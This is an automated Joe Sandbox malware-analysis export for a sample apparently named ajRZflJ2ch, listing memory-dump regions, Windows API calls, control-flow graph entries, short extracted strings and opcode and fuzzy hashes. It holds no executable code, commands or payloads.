                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 6fd4446e9fb3e06dffb78f21a23a2753a5b2ff994269da4c66203155cc72162e
                                                                                                            • Instruction ID: c43951830abe45a8fdc75bbd682083e4da0fb3d153b555a28372e418d0d4e56c
                                                                                                            • Opcode Fuzzy Hash: 6fd4446e9fb3e06dffb78f21a23a2753a5b2ff994269da4c66203155cc72162e
                                                                                                            • Instruction Fuzzy Hash: 8551E2B5D04349AFDF15CFA9C880ADEBFB5BF49310F24812AE418AB210D771A845CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1121 39eb0110-39eb0176 1122 39eb0178-39eb017e 1121->1122 1123 39eb0181-39eb0188 1121->1123 1122->1123 1124 39eb018a-39eb0190 1123->1124 1125 39eb0193-39eb0232 CreateWindowExW 1123->1125 1124->1125 1127 39eb023b-39eb0273 1125->1127 1128 39eb0234-39eb023a 1125->1128 1132 39eb0280 1127->1132 1133 39eb0275-39eb0278 1127->1133 1128->1127 1134 39eb0281 1132->1134 1133->1132 1134->1134
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 39EB0222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 361766d5c56f4ade22475599faf6b14c47382086f88c03d6f7fc4bc2e3ef166f
                                                                                                            • Instruction ID: 92741085590ba9b6add8924deb5ac5ac73627474ac407121de28d1ddcbeb50d5
                                                                                                            • Opcode Fuzzy Hash: 361766d5c56f4ade22475599faf6b14c47382086f88c03d6f7fc4bc2e3ef166f
                                                                                                            • Instruction Fuzzy Hash: 0541D2B5D04309EFDF15CFA9C980ADEBBB5BF48350F64812AE418AB210D775A845CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1135 39eb1dc0-39eb1dfc 1136 39eb1eac-39eb1ecc 1135->1136 1137 39eb1e02-39eb1e07 1135->1137 1143 39eb1ecf-39eb1edc 1136->1143 1138 39eb1e5a-39eb1e92 CallWindowProcW 1137->1138 1139 39eb1e09-39eb1e40 1137->1139 1140 39eb1e9b-39eb1eaa 1138->1140 1141 39eb1e94-39eb1e9a 1138->1141 1146 39eb1e49-39eb1e58 1139->1146 1147 39eb1e42-39eb1e48 1139->1147 1140->1143 1141->1140 1146->1143 1147->1146
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 39EB1E81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 6ca4320e344c00aa58c58ea63accf65f61cffc0c050c5a50aed3eee5a24ba3ee
                                                                                                            • Instruction ID: 17d8ef898bcc26d701ecddfee2866bc0f9d0437bd06ca91121ff592544f2e378
                                                                                                            • Opcode Fuzzy Hash: 6ca4320e344c00aa58c58ea63accf65f61cffc0c050c5a50aed3eee5a24ba3ee
                                                                                                            • Instruction Fuzzy Hash: 3241F4B9904349DFDB14CF99C884A9ABBF5FF88324F24C459D519AB321D774A841CBA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1346 39eb0bc0-39eb0c5c DuplicateHandle 1347 39eb0c5e-39eb0c64 1346->1347 1348 39eb0c65-39eb0c82 1346->1348 1347->1348
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 39EB0C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: bb1e5826120887dabab51ad88ab30c80243865699be30bc161bda5717b39b599
                                                                                                            • Instruction ID: 09e55150e4257395d852745eead095e1b9524ef965eaa5c60b00957e286ed40d
                                                                                                            • Opcode Fuzzy Hash: bb1e5826120887dabab51ad88ab30c80243865699be30bc161bda5717b39b599
                                                                                                            • Instruction Fuzzy Hash: D921E4B5D04349AFDB10CFAAD984ADEBFF4EB48310F24841AE958A7350D378A940CF61

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1351 39eb0bc8-39eb0c5c DuplicateHandle 1352 39eb0c5e-39eb0c64 1351->1352 1353 39eb0c65-39eb0c82 1351->1353 1352->1353
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 39EB0C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: c4edefe8d16b665f889e319b214e52da468e31215ba5a7efeb433eaca7d5b283
                                                                                                            • Instruction ID: 79dc5022cb34726340962ab7142761a523ef51c796a4e911319b8a18736f956e
                                                                                                            • Opcode Fuzzy Hash: c4edefe8d16b665f889e319b214e52da468e31215ba5a7efeb433eaca7d5b283
                                                                                                            • Instruction Fuzzy Hash: B221C6B5D00249AFDB10CFAAD584ADEBBF4EB48710F14841AE954A7350D374A950CF65
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 39EBD445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 67d67a98599a85ac68ecad9043e71099f52bf7fd32625794eca12e9a1cc28d39
                                                                                                            • Instruction ID: c3ace89adcfc37fc730f3c81a55ecac8fb265314a3d71e5c7795ddbe4ad88c24
                                                                                                            • Opcode Fuzzy Hash: 67d67a98599a85ac68ecad9043e71099f52bf7fd32625794eca12e9a1cc28d39
                                                                                                            • Instruction Fuzzy Hash: DE1136B5D043488FDF20CFA9D444BDEBBF4EB89324F24845AD518A7610C379A584CFA1
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: fa4b00a726cde6bfbf8d3f4190a333b25c179bd878a25de0ae07d6cd9755827b
                                                                                                            • Instruction ID: 5817ae738baeb7413a5b4c603ac066a788f96186e27c18c31a1a7617f3a706f1
                                                                                                            • Opcode Fuzzy Hash: fa4b00a726cde6bfbf8d3f4190a333b25c179bd878a25de0ae07d6cd9755827b
                                                                                                            • Instruction Fuzzy Hash: 551136B5800309DFDB10CF9AC444BDEBBF8EB58320F108419E558A7310C375A940CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 39EBD445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: db53e516b08ea516b43485ce6768eefd898b3edb61264e05d74869ac5e3bb808
                                                                                                            • Instruction ID: db5d8276ad3191c14583c184f056f2761cede362b9c86033ca09159b08d8a429
                                                                                                            • Opcode Fuzzy Hash: db53e516b08ea516b43485ce6768eefd898b3edb61264e05d74869ac5e3bb808
                                                                                                            • Instruction Fuzzy Hash: 871142B58043498FCB20DFAAC544B8EBBF8EB48320F208419E518A7310C778A980CFA5
                                                                                                            APIs
                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,39EBD92F), ref: 39EBE765
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: ffbeb0e0d08d9cde8afc555a8b565b7698a3cc9414885a8195b81e0e2abf1208
                                                                                                            • Instruction ID: a14ddc74ef713bb63dd474494cbb76c4fcc871d2c95ff00681d65ff9e6804965
                                                                                                            • Opcode Fuzzy Hash: ffbeb0e0d08d9cde8afc555a8b565b7698a3cc9414885a8195b81e0e2abf1208
                                                                                                            • Instruction Fuzzy Hash: 751130B9C002498FCB10CFAADA84BCEFBF0EB48320F10851AD418B7640C338A545CFA5
                                                                                                            APIs
                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,39EBD92F), ref: 39EBE765
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: bc32a9d1e1307c171baaee2c9112c675503dc96334471cb2787ff091ab1adef4
                                                                                                            • Instruction ID: 2d55d076ed70ec78b5fa5c07cf1e25a49c5a56c8853d45fd17589b7597b3564b
                                                                                                            • Opcode Fuzzy Hash: bc32a9d1e1307c171baaee2c9112c675503dc96334471cb2787ff091ab1adef4
                                                                                                            • Instruction Fuzzy Hash: 5A111DB5C043499FDB14CFAAD988B9EBBF4EB48320F10842AE418A7210C378A540CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: 3526e7d55b005f66d22f63c4fdf1d08ceeb9cf0bcb1cd27cfc928ed7ecb241b3
                                                                                                            • Instruction ID: 733556cfcc6411110e0929dabbdfbe6a10f3a4c4e96e1070519b1cb7781f3ebd
                                                                                                            • Opcode Fuzzy Hash: 3526e7d55b005f66d22f63c4fdf1d08ceeb9cf0bcb1cd27cfc928ed7ecb241b3
                                                                                                            • Instruction Fuzzy Hash: 301103B5800349DFDB10DF9AC885BDEBBF8EB48320F108419D518A7310C375A940CFA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: dr8
                                                                                                            • API String ID: 0-2562908008
                                                                                                            • Opcode ID: a18a848093595af67115ebc1ed2c62bad754c8de5fe33eea98be7e4408cee76f
                                                                                                            • Instruction ID: a08be46620394fceeec744be54810fad4747714c0ad9f126b0b1aa3d872762c4
                                                                                                            • Opcode Fuzzy Hash: a18a848093595af67115ebc1ed2c62bad754c8de5fe33eea98be7e4408cee76f
                                                                                                            • Instruction Fuzzy Hash: 1C51A070A002499FDB05EBA8D8519EEBBB1FF89300F1045A9D005BB266DB35AE41DF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Tk8
                                                                                                            • API String ID: 0-4048039222
                                                                                                            • Opcode ID: 68f4b1571d6388eaea4bc2fea5975f850a9c34c9f54e550358fe0d9e09b731ba
                                                                                                            • Instruction ID: d9f406c723c39db9a9ee1209cb9f094fd6237c0970052b3e19d25c2e296c5b1d
                                                                                                            • Opcode Fuzzy Hash: 68f4b1571d6388eaea4bc2fea5975f850a9c34c9f54e550358fe0d9e09b731ba
                                                                                                            • Instruction Fuzzy Hash: 25310876A0C3908FEB15CB75C8506EEBFF15F89B00F0481AED846E7651CB21AC0ACB61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Tk8
                                                                                                            • API String ID: 0-4048039222
                                                                                                            • Opcode ID: bb8d5706a907dcaf0bf24d01c595a76c0fad4abe306053de4116bf810d06ede3
                                                                                                            • Instruction ID: 2412308909e023424ed0a83299c0a2068b5a4b391810f63ae8bf3630eaf41a86
                                                                                                            • Opcode Fuzzy Hash: bb8d5706a907dcaf0bf24d01c595a76c0fad4abe306053de4116bf810d06ede3
                                                                                                            • Instruction Fuzzy Hash: B131C876A043058BEB28CF65D5506AEBFF5AF88B40F50862DD802A7640DF35EC05CBA0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: g8
                                                                                                            • API String ID: 0-1574894643
                                                                                                            • Opcode ID: a6333d544fa7945c60d5de684bc1d50d556fe1274a203ab5ce245de98de2409e
                                                                                                            • Instruction ID: f22405b6cf55f7672873186c8dd835b5a82a2614054a9068da785e38b2554746
                                                                                                            • Opcode Fuzzy Hash: a6333d544fa7945c60d5de684bc1d50d556fe1274a203ab5ce245de98de2409e
                                                                                                            • Instruction Fuzzy Hash: 37318C38E003458FEB09DBB5C4585ADBFF6AF88A44F24852EC806AB390DF348841CF90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tX6
                                                                                                            • API String ID: 0-4158506833
                                                                                                            • Opcode ID: 3d7c9257ce6f6d27e3fa228da5542cbd37814baa23e99f220200ac1bd0a49b07
                                                                                                            • Instruction ID: ed29554681c20b1dba339471f923ac1980cbb4f0e0fb768e790529d81bfd6c1c
                                                                                                            • Opcode Fuzzy Hash: 3d7c9257ce6f6d27e3fa228da5542cbd37814baa23e99f220200ac1bd0a49b07
                                                                                                            • Instruction Fuzzy Hash: E4118E30744A418FD714CF6DC45185ABBF6AF8A64431542AEE045CB772DB30EC86DB90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: tX6
                                                                                                            • API String ID: 0-4158506833
                                                                                                            • Opcode ID: 3aee5220db02d2b195eb8be3f4e56c5740a34521a713b18f629f81f4e0c80eff
                                                                                                            • Instruction ID: 873d55461839400036c4299d2c6e239bfc0ffd5c2304828d238016031a1adae0
                                                                                                            • Opcode Fuzzy Hash: 3aee5220db02d2b195eb8be3f4e56c5740a34521a713b18f629f81f4e0c80eff
                                                                                                            • Instruction Fuzzy Hash: CF016931740A018FD314DF2EC88191ABBF6FFC9B44315866AE406CB321EB30EC469B90
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: j8
                                                                                                            • API String ID: 0-2773366914
                                                                                                            • Opcode ID: d0e88a4485a6f8ead3b5d3d24ea348b6b30a5fb70b74d53bf85d65b851f48c14
                                                                                                            • Instruction ID: f4b6e3f8d96848e42bfb68ce243342e7844a36fb6b354066c559ef7765c26794
                                                                                                            • Opcode Fuzzy Hash: d0e88a4485a6f8ead3b5d3d24ea348b6b30a5fb70b74d53bf85d65b851f48c14
                                                                                                            • Instruction Fuzzy Hash: 80F0F471E08218DBEB00AB64C9047AF7FA5FB88750F10562AE80457640DB35B419CBD2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d2afd5683e36d52957e885926920c0261a039e861c34ce94b41c1dcf9e28581
                                                                                                            • Instruction ID: 32c67eba9c7c4f5e60918e229fca93062580b52f543143eb5dd5388ffc8b0ced
                                                                                                            • Opcode Fuzzy Hash: 0d2afd5683e36d52957e885926920c0261a039e861c34ce94b41c1dcf9e28581
                                                                                                            • Instruction Fuzzy Hash: 2852DE34A0021C8FEB25DBA4D861B9EBB72EF88700F1081B9D10A6B795DF355E85EF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b073c4fb5c97d494d9b8d23bdd0e6558f180951f9e80615cba9c0e77fa562509
                                                                                                            • Instruction ID: 760e281ca9dce887c5b31e71354c0878622abe99899da6ff46078aa55d566c37
                                                                                                            • Opcode Fuzzy Hash: b073c4fb5c97d494d9b8d23bdd0e6558f180951f9e80615cba9c0e77fa562509
                                                                                                            • Instruction Fuzzy Hash: B542C3BAE6D7D58BD712CB306878255BFF0AB62204B1E4DDFD0C192193E7A08486C767
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d341599552fb7ff3819b50b60d64329c467daf124dbf49fac4adbf4088b389c0
                                                                                                            • Instruction ID: 30be179931b79fc3c50711d3f2ca0d1efdcc7f9fce218cdb0e25cd5c450cf535
                                                                                                            • Opcode Fuzzy Hash: d341599552fb7ff3819b50b60d64329c467daf124dbf49fac4adbf4088b389c0
                                                                                                            • Instruction Fuzzy Hash: 68124930A003499FCB54CF68D994AAEBBF1BF89314F15855AE845EB361DB32ED41CB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a739027264d5efb19ae9d7c4c2bad234e08f4d2e805b7882a345b864afe3fed
                                                                                                            • Instruction ID: 3044e4f4d3ecf0bdc7aefd64b54b1b7916c8f4db5fbb323e0edb55984a67e3b1
                                                                                                            • Opcode Fuzzy Hash: 8a739027264d5efb19ae9d7c4c2bad234e08f4d2e805b7882a345b864afe3fed
                                                                                                            • Instruction Fuzzy Hash: 7CB1AC343047518FDB659F24C854B7E7BE2AF89301F14856AE846CB7A1DB38CC42DBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e79179c45b79591f2c9079e0fc4ede68afd3cf293c3a0fb686c979aa407a5863
                                                                                                            • Instruction ID: a119adbf80cca2f27ba2d5c628e73641c035c6e99f2ab8dde50443ae780bb839
                                                                                                            • Opcode Fuzzy Hash: e79179c45b79591f2c9079e0fc4ede68afd3cf293c3a0fb686c979aa407a5863
                                                                                                            • Instruction Fuzzy Hash: 35E1D334A40258CFDB25DF64C855BADBBB2FB89701F5085AAD80A77390CB359E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b0113ddf861b51520d4e2d44a2cbdd404d327c01caeab922cd59a61e7cedb775
                                                                                                            • Instruction ID: 6a881156960cbc0ae1df36cba46db2b6b0a3241f2bc56e37691ff9e19385e9e7
                                                                                                            • Opcode Fuzzy Hash: b0113ddf861b51520d4e2d44a2cbdd404d327c01caeab922cd59a61e7cedb775
                                                                                                            • Instruction Fuzzy Hash: 12E1D334A40258CFDB25DF64C855BADBBB2FB89701F5085AAD80A77390CB359E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 895135d624e047131b4196463ec74d957d813a46e90e8b04be050c92373faf96
                                                                                                            • Instruction ID: 3e11c5a0cb2f68dfb0d9b50b377e7c6a8f3f6603313979e8686a1f2eefcd36d7
                                                                                                            • Opcode Fuzzy Hash: 895135d624e047131b4196463ec74d957d813a46e90e8b04be050c92373faf96
                                                                                                            • Instruction Fuzzy Hash: 1A9105709057459FC715CF2CC8849AABBB1FF85320B15C6A7D8959B362C731E816CBB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ef6d800e6c5d5ebb6fd371ddb4d421267a577d45656edded3986c72dddfe5119
                                                                                                            • Instruction ID: d2de19d19f020328cc19c75019f1b106398285b51e90a4424682468e2b7a2aa8
                                                                                                            • Opcode Fuzzy Hash: ef6d800e6c5d5ebb6fd371ddb4d421267a577d45656edded3986c72dddfe5119
                                                                                                            • Instruction Fuzzy Hash: C7817034A00A05CFCB54CF69C894AAEB7F2BF89316B65816AD805DB365DB31EC41CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 28e610c23a1e6127aa7ee11ccc6c536836de825e8b8502f3ea972ba4c9898719
                                                                                                            • Instruction ID: 3396b999d6ab838e2e99b4c5160eac45194986512d8bb1c2e0ef8ed8ff8c0bd3
                                                                                                            • Opcode Fuzzy Hash: 28e610c23a1e6127aa7ee11ccc6c536836de825e8b8502f3ea972ba4c9898719
                                                                                                            • Instruction Fuzzy Hash: 1BA1C374A40399CFDF04DFA8D896A9DBBB1FB8C705B104229E405AB365DB386D06CF80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 119bf08920c32083531908ea02951afb9d16c1657244569372795433afd11260
                                                                                                            • Instruction ID: d757d51866a04ef3f96ed9eeb24985e9b6ce4d1072e2f55ea57716502dbfe202
                                                                                                            • Opcode Fuzzy Hash: 119bf08920c32083531908ea02951afb9d16c1657244569372795433afd11260
                                                                                                            • Instruction Fuzzy Hash: 7C71F9347003058FDB55DF28C894A6E7BE6AF59700F1944A6E806CB3B1DB76EC41DBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a6f181f5185d6b01683692db5e55af0c764b9e7c9e616d841e5898d7bc80b89
                                                                                                            • Instruction ID: b31af4c81289681a489ede5bdab69268f6099dfc82953779e04dd4675be48985
                                                                                                            • Opcode Fuzzy Hash: 8a6f181f5185d6b01683692db5e55af0c764b9e7c9e616d841e5898d7bc80b89
                                                                                                            • Instruction Fuzzy Hash: 27A1C374A40399CFDF04DFA8D896A9DBBB5FB8C705B104229E405AB365DB386906CF81
                                                                                                            Memory Dump Source
